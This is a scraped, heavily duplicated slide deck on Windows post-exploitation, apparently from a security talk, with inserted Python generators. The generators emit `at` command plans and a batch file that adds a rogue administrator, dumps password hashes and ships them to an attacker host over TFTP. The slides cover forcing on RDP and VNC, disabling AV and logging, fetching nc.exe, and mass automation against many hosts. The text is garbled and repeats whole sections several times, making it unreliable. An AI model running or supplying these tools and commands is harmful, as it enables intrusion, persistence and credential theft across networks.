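    """
    p = principal.lstrip('*')
    reasons = []
    if reg_values.get('fDenyTSConnections', 1) != 0:
        reasons.append('fDenyTSConnections is not 0')
    if p not in rights.get('seremoteinteractivelogonright', []):
        reasons.append('%s lacks SeRemoteInteractiveLogonRight' % principal)
    if p in rights.get('sedenyremoteinteractivelogonright', []):
        reasons.append('%s is denied remote interactive logon' % principal)
    return (not reasons, reasons)


def merge_privilege_right(rights, right_name, principal):
    """Template line that grants `principal` without dropping the current holders.

    A [Privilege Rights] line is the complete assignment, so a template that
    says only 'SeInteractiveLogonRight = hacked_account' takes the right away
    from Administrators and Users.  Re-emitting the existing holders (with '*'
    restored on SIDs) beside the new principal avoids that lockout.
    """
    current = rights.get(right_name.lower(), [])
    merged = current + ([] if principal in current else [principal])
    rendered = ','.join(('*' + p) if p.upper().startswith('S-1-') else p for p in merged)
    return '%s = %s' % (right_name, rendered)


if __name__ == '__main__':
    reg = parse_reg_dwords(SAMPLE_TS_REG)
    rights = parse_privilege_rights(SAMPLE_POLICY_INF)
    print(rdp_logon_allowed(reg, rights, 'hacked_account'))
    print(merge_privilege_right(rights, 'SeRemoteInteractiveLogonRight', 'S-1-5-21-1-2-3-1105'))
```

Run it against the real exports after `gpupdate /force` has completed; if `rdp_logon_allowed` comes back false with "fDenyTSConnections is not 0", a policy refresh has reverted the registry change and the GPO itself, not the local setting, is what stands in your way.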

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Old-school techniques can get results on new problems

• Remember, this is POST exploitation, so you already have some access

• The AT command schedules things to run at a specified time and date
– The Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
– ClipBook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not

• AT is as good as having a shell
– Enable / start services
– Transfer files
– Add users
– Mess with the registry, policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
  • Establish authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
– net use \\target
– net time \\target
– at \\target (net time +1min) "tftp -i myip GET e.bat"
– at \\target (net time +2min) e.bat
– e.bat does:
  • Adds a user (net user hacked hacked /add)
  – Admin group (net localgroup administrators hacked /add)
  • Gets hash-dumping tools and dumps hashes
  • Sends hashes, identified by IP, back to the attacker host
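An added example of the AT-driven flow from slides 60 and 61, written for this page and not the authors' AtAbuse tool. It reads the target's clock from `net time` output (a constructed sample in the US-locale format is embedded), computes the `at` times one and two minutes ahead on that clock, including the rollover past midnight, and emits the `net use` / `at` command lines plus the e.bat body for one host or a whole range. Everything is returned as strings; nothing is executed. Assumptions not on the slides: TFTP in both directions, a dumper staged under the placeholder name pwdump.exe, `cmd /c` in front of the batch file, and the target IP passed to e.bat as %1 so the returned hash file is named after the host that produced it.

```python
r"""
Plan an AT-driven job against one or more hosts, timed from their own clocks.

Added example, not the authors' AtAbuse tool.  The flow on slides 60-61 is:
authenticate, read the target's clock with `net time`, schedule a TFTP fetch
of a batch file one minute out and its execution a minute after that.  The
functions below do the clock arithmetic and emit the exact command lines; they
do not run anything, so a plan can be reviewed before it is fed to a runner.
Assumptions (none of them on the slides): `net time` output in the US locale
("Current time at \\HOST is 3/15/2008 11:59 PM"), TFTP for both directions,
a hash dumper staged as pwdump.exe (placeholder name), the target IP passed to
e.bat as %1 so dumped hashes are named after the host that produced them, and
`cmd /c` in front of the batch file because AT does not go through cmd itself.
"""
import re
from datetime import datetime, timedelta

# Constructed sample of `net time \\192.168.1.1` output (XP/2003 layout).
SAMPLE_NET_TIME = '''Current time at \\\\192.168.1.1 is 3/15/2008 11:59 PM

The command completed successfully.
'''

_NET_TIME = re.compile(
    r'Current time at \\\\(?P<host>\S+) is '
    r'(?P<m>\d{1,2})/(?P<d>\d{1,2})/(?P<y>\d{4}) '
    r'(?P<hh>\d{1,2}):(?P<mm>\d{2})(?::(?P<ss>\d{2}))?\s*(?P<ampm>AM|PM)?', re.I)


def parse_net_time(output):
    """Return the remote clock as a datetime, or None if no time line is present.

    The target's clock is what matters: the remote Schedule service fires the
    job on its own time, so a skewed or differently-zoned target would run the
    job hours late (or not at all today) if we scheduled from our clock.
    """
    m = _NET_TIME.search(output)
    if not m:
        return None
    hour = int(m.group('hh'))
    ampm = (m.group('ampm') or '').upper()
    if ampm == 'PM' and hour != 12:
        hour += 12
    elif ampm == 'AM' and hour == 12:
        hour = 0
    return datetime(int(m.group('y')), int(m.group('m')), int(m.group('d')),
                    hour, int(m.group('mm')), int(m.group('ss') or 0))


def at_time(remote_now, minutes_ahead):
    """Format remote_now + N minutes as the 24-hour HH:MM that AT accepts.

    Seconds are dropped, so with minutes_ahead=1 the job may fire within a
    second of scheduling; keep the payload run two minutes out so the fetch
    has finished.  Rolling past midnight is fine: AT takes the next occurrence.
    """
    return (remote_now + timedelta(minutes=minutes_ahead)).strftime('%H:%M')


def build_payload_batch(attacker_ip, user='hacked', password='hacked'):
    """e.bat as described on slide 61: add an admin, dump hashes, ship them back.

    %1 is the target IP handed over on the AT command line.  pwdump.exe stands
    in for whatever dumper you stage; AT runs the job as SYSTEM, which is what
    a hash dump needs.
    """
    return '\r\n'.join([
        '@echo off',
        'rem %1 = this host IP, supplied by the caller',
        'net user %s %s /add' % (user, password),
        'net localgroup administrators %s /add' % user,
        'tftp -i %s GET pwdump.exe' % attacker_ip,
        'pwdump.exe > %1.txt',
        'tftp -i %s PUT %%1.txt' % attacker_ip,
        'del pwdump.exe %1.txt e.bat',
    ]) + '\r\n'


def build_at_plan(target, username, password, attacker_ip, net_time_output):
    """Ordered command lines for one host; raises if its clock can't be read."""
    remote_now = parse_net_time(net_time_output)
    if remote_now is None:
        raise ValueError('could not parse net time output for %s' % target)
    return [
        'net use \\\\%s\\ipc$ %s /user:%s' % (target, password, username),
        'at \\\\%s %s "tftp -i %s GET e.bat"' % (target, at_time(remote_now, 1), attacker_ip),
        'at \\\\%s %s "cmd /c e.bat %s"' % (target, at_time(remote_now, 2), target),
    ]


def build_range_plan(targets, username, password, attacker_ip, net_time_by_host):
    """The 'ranges of hosts' case: a plan per host, empty where the clock was unreadable."""
    plans = {}
    for host in targets:
        try:
            plans[host] = build_at_plan(host, username, password, attacker_ip,
                                        net_time_by_host.get(host, ''))
        except ValueError:
            plans[host] = []  # unreachable or no session: skip, don't stall the sweep
    return plans


if __name__ == '__main__':
    for line in build_at_plan('192.168.1.1', 'admin', 's3cret', '10.0.0.5', SAMPLE_NET_TIME):
        print(line)
    print(build_payload_batch('10.0.0.5'))
```

The plan is deliberately two AT jobs rather than one: the fetch has to finish before the batch file exists, and AT gives you minute granularity at best, so a single job that downloads and runs in the same line would race the TFTP transfer on a slow link.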

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts

• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 47: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 48: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 49: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 50: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

